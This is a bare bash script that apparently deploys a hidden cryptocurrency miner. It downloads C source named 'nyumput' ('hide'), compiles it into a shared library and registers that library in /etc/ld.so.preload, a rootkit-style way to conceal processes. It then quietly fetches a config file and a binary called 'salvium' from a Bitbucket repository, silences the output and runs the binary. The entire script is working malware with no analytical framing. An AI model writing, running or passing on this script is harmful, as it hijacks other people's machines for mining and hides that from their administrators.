#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/cornea99/upil/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
mkdir .kap && cd .kap
wget https://bitbucket.org/krupuk2/apile/raw/main/config.json >/dev/null 2>&1
wget -O sgr1 https://bitbucket.org/krupuk2/apile/raw/03e2d4504932fb7a3a6df68f2ceca3b0ca6b5040/salvium >/dev/null 2>&1
chmod +x sgr1 config.json
./sgr1 -c "config.json" 
